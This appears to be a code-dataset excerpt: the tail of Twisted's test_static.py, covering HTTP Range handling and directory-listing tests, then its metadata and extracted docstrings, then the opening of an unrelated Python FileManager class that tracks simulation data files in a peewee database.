expected = "Ignoring malformed Range header %r" % (range.decode(),)
self._assertLogged(expected)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def parseMultipartBody(self, body, boundary):
"""
Parse C{body} as a multipart MIME response separated by C{boundary}.
Note that this with fail the calling test on certain syntactic
problems.
"""
sep = b"\r\n--" + boundary
parts = body.split(sep)
self.assertEqual(b'', parts[0])
self.assertEqual(b'--\r\n', parts[-1])
parsed_parts = []
for part in parts[1:-1]:
before, header1, header2, blank, partBody = part.split(b'\r\n', 4)
headers = header1 + b'\n' + header2
self.assertEqual(b'', before)
self.assertEqual(b'', blank)
partContentTypeValue = re.search(
b'^content-type: (.*)$', headers, re.I|re.M).group(1)
start, end, size = re.search(
b'^content-range: bytes ([0-9]+)-([0-9]+)/([0-9]+)$',
headers, re.I|re.M).groups()
parsed_parts.append(
{b'contentType': partContentTypeValue,
b'contentRange': (start, end, size),
b'body': partBody})
return parsed_parts
def test_multipleRangeRequest(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response.
"""
startEnds = [(0, 2), (20, 30), (40, 50)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), e)
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_multipleRangeRequestWithRangeOverlappingEnd(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response, even when one of the ranged falls off the end of
the resource.
"""
startEnds = [(0, 2), (40, len(self.payload) + 10)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), min(e, self.resource.getFileSize()-1))
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_implicitEnd(self):
"""
If the end byte position is omitted, then it is treated as if the
length of the resource was specified by the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=23-')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[23:])
self.assertEqual(len(b''.join(self.request.written)), 41)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 23-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'41')
def test_implicitStart(self):
"""
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=-17')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[-17:])
self.assertEqual(len(b''.join(self.request.written)), 17)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 47-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'17')
def test_explicitRange(self):
"""
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=3-43')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[3:44])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 3-43/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_explicitRangeOverlappingEnd(self):
"""
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=40-100')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[40:])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 40-63/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_statusCodeRequestedRangeNotSatisfiable(self):
"""
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=20-13')
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def test_invalidStartBytePos(self):
"""
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=67-108')
self.resource.render(self.request)
self.assertEqual(
self.request.responseCode, http.REQUESTED_RANGE_NOT_SATISFIABLE)
self.assertEqual(b''.join(self.request.written), b'')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'0')
# Sections 10.4.17 and 14.16
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
networkString('bytes */%d' % (len(self.payload),)))
class DirectoryListerTests(TestCase):
"""
Tests for L{static.DirectoryLister}.
"""
def _request(self, uri):
request = DummyRequest([b''])
request.uri = uri
return request
def test_renderHeader(self):
"""
L{static.DirectoryLister} prints the request uri as header of the
rendered content.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
self.assertIn(b"<h1>Directory listing for foo</h1>", data)
self.assertIn(b"<title>Directory listing for foo</title>", data)
def test_renderUnquoteHeader(self):
"""
L{static.DirectoryLister} unquote the request uri before printing it.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%20bar'))
self.assertIn(b"<h1>Directory listing for foo bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo bar</title>", data)
def test_escapeHeader(self):
"""
L{static.DirectoryLister} escape "&", "<" and ">" after unquoting the
request uri.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%26bar'))
self.assertIn(b"<h1>Directory listing for foo&bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo&bar</title>", data)
def test_renderFiles(self):
"""
L{static.DirectoryLister} is able to list all the files inside a
directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1').setContent(b"content1")
path.child('file2').setContent(b"content2" * 1000)
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="file1">file1</a></td>
<td>8B</td>
<td>[text/html]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="file2">file2</a></td>
<td>7K</td>
<td>[text/html]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderDirectories(self):
"""
L{static.DirectoryLister} is able to list all the directories inside
a directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2 & 3').makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir2%20%26%203/">dir2 & 3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderFiltered(self):
"""
L{static.DirectoryLister} takes an optional C{dirs} argument that
filter out the list of directories and files printed.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2').makedirs()
path.child('dir3').makedirs()
lister = static.DirectoryLister(path.path, dirs=["dir1", "dir3"])
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir3/">dir3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_oddAndEven(self):
"""
L{static.DirectoryLister} gives an alternate class for each odd and
even rows in the table.
"""
lister = static.DirectoryLister(None)
elements = [{"href": "", "text": "", "size": "", "type": "",
"encoding": ""} for i in range(5)]
content = lister._buildTableContent(elements)
self.assertEqual(len(content), 5)
self.assertTrue(content[0].startswith('<tr class="odd">'))
self.assertTrue(content[1].startswith('<tr class="even">'))
self.assertTrue(content[2].startswith('<tr class="odd">'))
self.assertTrue(content[3].startswith('<tr class="even">'))
self.assertTrue(content[4].startswith('<tr class="odd">'))
def test_contentType(self):
"""
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
req = self._request(b'')
lister.render(req)
self.assertEqual(req.responseHeaders.getRawHeaders(b'content-type')[0],
b"text/html; charset=utf-8")
def test_mimeTypeAndEncodings(self):
"""
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1.txt').setContent(b"file1")
path.child('file2.py').setContent(b"python")
path.child('file3.conf.gz').setContent(b"conf compressed")
path.child('file4.diff.bz2').setContent(b"diff compressed")
directory = os.listdir(path.path)
directory.sort()
contentTypes = {
".txt": "text/plain",
".py": "text/python",
".conf": "text/configuration",
".diff": "text/diff"
}
lister = static.DirectoryLister(path.path, contentTypes=contentTypes)
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [
{'encoding': '',
'href': 'file1.txt',
'size': '5B',
'text': 'file1.txt',
'type': '[text/plain]'},
{'encoding': '',
'href': 'file2.py',
'size': '6B',
'text': 'file2.py',
'type': '[text/python]'},
{'encoding': '[gzip]',
'href': 'file3.conf.gz',
'size': '15B',
'text': 'file3.conf.gz',
'type': '[text/configuration]'},
{'encoding': '[bzip2]',
'href': 'file4.diff.bz2',
'size': '15B',
'text': 'file4.diff.bz2',
'type': '[text/diff]'}])
@skipIf(not platform._supportsSymlinks(), "No symlink support")
def test_brokenSymlink(self):
"""
If on the file in the listing points to a broken symlink, it should not
be returned by L{static.DirectoryLister._getFilesAndDirectories}.
"""
path = FilePath(self.mktemp())
path.makedirs()
file1 = path.child('file1')
file1.setContent(b"file1")
file1.linkTo(path.child("file2"))
file1.remove()
lister = static.DirectoryLister(path.path)
directory = os.listdir(path.path)
directory.sort()
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [])
def test_childrenNotFound(self):
"""
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
request = self._request(b'')
child = resource.getChildForRequest(lister, request)
result = _render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, http.NOT_FOUND)
result.addCallback(cbRendered)
return result
def test_repr(self):
"""
L{static.DirectoryLister.__repr__} gives the path of the lister.
"""
path = FilePath(self.mktemp())
lister = static.DirectoryLister(path.path)
self.assertEqual(repr(lister),
"<DirectoryLister of %r>" % (path.path,))
self.assertEqual(str(lister),
"<DirectoryLister of %r>" % (path.path,))
def test_formatFileSize(self):
"""
L{static.formatFileSize} format an amount of bytes into a more readable
format.
"""
self.assertEqual(static.formatFileSize(0), "0B")
self.assertEqual(static.formatFileSize(123), "123B")
self.assertEqual(static.formatFileSize(4567), "4K")
self.assertEqual(static.formatFileSize(8900000), "8M")
self.assertEqual(static.formatFileSize(1234000000), "1G")
self.assertEqual(static.formatFileSize(1234567890000), "1149G")
class LoadMimeTypesTests(TestCase):
"""
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
"""
UNSET = object()
def setUp(self):
self.paths = self.UNSET
def _fakeInit(self, paths):
"""
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
"""
self.paths = paths
def test_defaultArgumentIsNone(self):
"""
By default, L{None} is passed to C{mimetypes.init}.
"""
static.loadMimeTypes(init=self._fakeInit)
self.assertIdentical(self.paths, None)
def test_extraLocationsWork(self):
"""
Passed MIME type files are passed to C{mimetypes.init}.
"""
paths = ["x", "y", "z"]
static.loadMimeTypes(paths, init=self._fakeInit)
self.assertIdentical(self.paths, paths)
def test_usesGlobalInitFunction(self):
"""
By default, C{mimetypes.init} is called.
"""
# Checking mimetypes.inited doesn't always work, because
# something, somewhere, calls mimetypes.init. Yay global
# mutable state :)
if getattr(inspect, "signature", None):
signature = inspect.signature(static.loadMimeTypes)
self.assertIs(signature.parameters["init"].default,
mimetypes.init)
else:
args, _, _, defaults = inspect.getargspec(static.loadMimeTypes)
defaultInit = defaults[args.index("init")]
self.assertIs(defaultInit, mimetypes.init)
class StaticDeprecationTests(TestCase):
def test_addSlashDeprecated(self):
"""
L{twisted.web.static.addSlash} is deprecated.
"""
from twisted.web.static import addSlash
addSlash(DummyRequest([b'']))
warnings = self.flushWarnings([self.test_addSlashDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(warnings[0]['message'],
"twisted.web.static.addSlash was deprecated in Twisted 16.0.0")
| src/twisted/web/test/test_static.py | 67,812 | Tests for L{static.DirectoryLister}.
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
Tests for L{MultipleRangeStaticProducer}.
Tests for L{NoRangeStaticProducer}.
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
Tests for L{SingleRangeStaticProducer}.
Tests for L{Data}.
Tests for the basic behavior of L{File}.
Tests for L{File.makeProducer}.
Tests for the abstract L{StaticProducer}.
Asserts that a given log message occurred with an expected message.
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
Create a L{File} that when opened for reading, returns a L{StringIO}.
@return: 2-tuple of the opened "file" and the L{File}.
@rtype: L{tuple}
Extract the content-* headers from the L{DummyRequest} C{request}.
This returns the subset of C{request.outgoingHeaders} of headers that
start with 'content-'.
Make a L{static.File} resource that has C{content} for its content.
@param content: The L{bytes} to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
Parse C{body} as a multipart MIME response separated by C{boundary}.
Note that this with fail the calling test on certain syntactic
problems.
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
Clean up the resource file and the log observer.
A HEAD request opens the file, gets the size, and then closes it after
the request.
L{twisted.web.static.addSlash} is deprecated.
Passing C{1} as the value to L{File}'s C{allowExt} argument
issues a warning and sets the ignored extensions to the
wildcard C{*}.
A correct response to a range request is as long as the length of the
requested range.
If on the file in the listing points to a broken symlink, it should not
be returned by L{static.DirectoryLister._getFilesAndDirectories}.
A GET request that is cached closes the file after the request.
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
By default, L{None} is passed to C{mimetypes.init}.
A request for a path which is a directory but does not have a trailing
slash will be redirected to a URL which does have a slash by L{File}.
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
The C{u''} child of a L{File} which corresponds to a directory
whose path is text is a L{DirectoryLister} that renders to a
binary listing.
@see: U{https://twistedmatrix.com/trac/ticket/9438}
L{static.DirectoryLister} escape "&", "<" and ">" after unquoting the
request uri.
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
Passed MIME type files are passed to C{mimetypes.init}.
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
The resource rendered for forbidden requests is stored as a class
member so that users can customize it.
L{File.forbidden} defaults to L{resource.ForbiddenResource}.
L{static.formatFileSize} format an amount of bytes into a more readable
format.
The resource rendered for child not found requests can be customize
using a class member.
L{Data.render} returns an empty response body for a I{HEAD} request.
L{static.File.render} returns an empty response body for I{HEAD}
requests.
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the empty
list.
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the
wildcard C{"*"}.
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
L{NoRangeStaticProducer} implements L{IPullProducer}.
L{SingleRangeStaticProducer} implements L{IPullProducer}.
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
If the end byte position is omitted, then it is treated as if the
length of the resource was specified by the end byte position.
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character followed by a specific range.
Only 'bytes' is defined) results in the range header value being logged
and a normal 200 response being sent.
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
makeProducer when the Range header requests a single byte range
returns an instance of MultipleRangeStaticProducer.
The response to a request for multiple bytes ranges is a MIME-ish
multipart response.
The response to a request for multiple bytes ranges is a MIME-ish
multipart response, even when one of the ranged falls off the end of
the resource.
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
If multiple byte ranges are specified their starts and stops are
returned.
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
none of which are satisfiable.
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
makeProducer when no Range header is set sets the Content-* headers
for the response.
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
L{static.DirectoryLister} gives an alternate class for each odd and
even rows in the table.
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
A single bytes range without an explicit start position is parsed into
a two-tuple of L{None} and the end position.
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and L{None}.
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
L{static.DirectoryLister} is able to list all the directories inside
a directory.
L{static.DirectoryLister} is able to list all the files inside a
directory.
L{static.DirectoryLister} takes an optional C{dirs} argument that
filter out the list of directories and files printed.
L{static.DirectoryLister} prints the request uri as header of the
rendered content.
L{static.DirectoryLister} unquote the request uri before printing it.
L{static.DirectoryLister.__repr__} gives the path of the lister.
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
A request for a existing unicode file path encoded as UTF-8
returns the contents of that file.
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
A request whose path cannot be decoded as UTF-8 receives a not
found response, and the failure is logged.
By default, C{mimetypes.init} is called.
Tests for L{twisted.web.static}.
Copyright (c) Twisted Matrix Laboratories. See LICENSE for details. Make sure we can delete the file later. Get rid of our own read permission. Open our file instead of a real one This request will always return saying that it is cached The only content-* headers set are content-type and content-length. The content-length depends on the boundary used in the response. Content-type should be set to a value indicating a multipart response and the boundary used to separate the parts. Content-encoding is not set in the response to a multiple range response, which is a bit wussy but works well enough with the way static.File does content-encodings... start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. This is just a jumble of random stuff. It's supposed to be a good set of data for this test, particularly in order to avoid accidentally seeing the right result by having a byte sequence repeated at different locations or by having byte values which are somehow correlated with their position in the string. there's no = unknown isn't a valid Bytes-Unit there's no - in =stuff both start and end are empty start isn't an integer end isn't an integer end isn't equal to or greater than start Sections 10.4.17 and 14.16 Checking mimetypes.inited doesn't always work, because something, somewhere, calls mimetypes.init. Yay global mutable state :) | 15,817 | en | 0.861238 |
import os
import re
import sys
import threading
import logging
import random
from time import sleep
from peewee import *
from enum import IntEnum
from threading import Thread
from models import DataFile
from lib.jobstatus import JobStatus
from lib.util import print_debug
from lib.util import print_line
from lib.util import print_message
class FileStatus(IntEnum):
PRESENT = 0
NOT_PRESENT = 1
IN_TRANSIT = 2
class FileManager(object):
"""
Manage all files required by jobs
"""
def __init__(self, event_list, config, database='processflow.db'):
"""
Parameters:
database (str): the path to where to create the sqlite database file
config (dict): the global configuration dict
"""
self._event_list = event_list
self._db_path = database
self._config = config
if os.path.exists(database):
os.remove(database)
DataFile._meta.database.init(database)
if DataFile.table_exists():
DataFile.drop_table()
DataFile.create_table()
self.thread_list = list()
self.kill_event = threading.Event()
def __str__(self):
# TODO: make this better
return str({
'db_path': self._db_path,
})
def get_endpoints(self):
"""
Return a list of globus endpoints for all cases
"""
q = (DataFile
.select()
.where(
DataFile.transfer_type == 'globus'))
endpoints = list()
for x in q.execute():
if x.remote_uuid not in endpoints:
endpoints.append(x.remote_uuid)
return endpoints
def write_database(self):
"""
Write out a human readable version of the database for debug purposes
"""
file_list_path = os.path.join(
self._config['global']['project_path'],
'output',
'file_list.txt')
with open(file_list_path, 'w') as fp:
try:
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
fp.write('+++++++++++++++++++++++++++++++++++++++++++++')
fp.write('\n\t{case}\t\n'.format(case=case))
fp.write('+++++++++++++++++++++++++++++++++++++++++++++\n')
q = (DataFile
.select(DataFile.datatype)
.where(DataFile.case == case)
.distinct())
for df_type in q.execute():
_type = df_type.datatype
fp.write('===================================\n')
fp.write('\t' + _type + ':\n')
datafiles = (DataFile
.select()
.where(
(DataFile.datatype == _type) &
(DataFile.case == case)))
for datafile in datafiles.execute():
filestr = '-------------------------------------'
filestr += '\n\t name: ' + datafile.name + '\n\t local_status: '
if datafile.local_status == 0:
filestr += ' present, '
elif datafile.local_status == 1:
filestr += ' missing, '
else:
filestr += ' in transit, '
filestr += '\n\t remote_status: '
if datafile.remote_status == 0:
filestr += ' present'
elif datafile.remote_status == 1:
filestr += ' missing'
else:
filestr += ' in transit'
filestr += '\n\t local_size: ' + \
str(datafile.local_size)
filestr += '\n\t local_path: ' + datafile.local_path
filestr += '\n\t remote_path: ' + datafile.remote_path
filestr += '\n\t year: ' + str(datafile.year)
filestr += '\n\t month: ' + str(datafile.month) + '\n'
fp.write(filestr)
except Exception as e:
print_debug(e)
def check_data_ready(self, data_required, case, start_year=None, end_year=None):
try:
for datatype in data_required:
if start_year and end_year:
q = (DataFile
.select()
.where(
(DataFile.year >= start_year) &
(DataFile.year <= end_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype)))
else:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
datafiles = q.execute()
for df in datafiles:
if not os.path.exists(df.local_path) and df.local_status == FileStatus.PRESENT.value:
df.local_status = FileStatus.NOT_PRESENT.value
df.save()
elif os.path.exists(df.local_path) and df.local_status == FileStatus.NOT_PRESENT.value:
df.local_status = FileStatus.PRESENT.value
df.save()
if df.local_status != FileStatus.PRESENT.value:
return False
return True
except Exception as e:
print_debug(e)
def render_file_string(self, data_type, data_type_option, case, year=None, month=None):
"""
Takes strings from the data_types dict and replaces the keywords with the appropriate values
"""
# setup the replacement dict
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
replace = {
'PROJECT_PATH': self._config['global']['project_path'],
'REMOTE_PATH': self._config['simulations'][case].get('remote_path', ''),
'CASEID': case,
'REST_YR': '{:04d}'.format(start_year + 1),
'START_YR': '{:04d}'.format(start_year),
'END_YR': '{:04d}'.format(end_year),
'LOCAL_PATH': self._config['simulations'][case].get('local_path', '')
}
if year is not None:
replace['YEAR'] = '{:04d}'.format(year)
if month is not None:
replace['MONTH'] = '{:02d}'.format(month)
if self._config['data_types'][data_type].get(case):
if self._config['data_types'][data_type][case].get(data_type_option):
instring = self._config['data_types'][data_type][case][data_type_option]
for item in self._config['simulations'][case]:
if item.upper() in self._config['data_types'][data_type][case][data_type_option]:
instring = instring.replace(item.upper(), self._config['simulations'][case][item])
return instring
instring = self._config['data_types'][data_type][data_type_option]
for string, val in replace.items():
if string in instring:
instring = instring.replace(string, val)
return instring
def populate_file_list(self):
"""
Populate the database with the required DataFile entries
"""
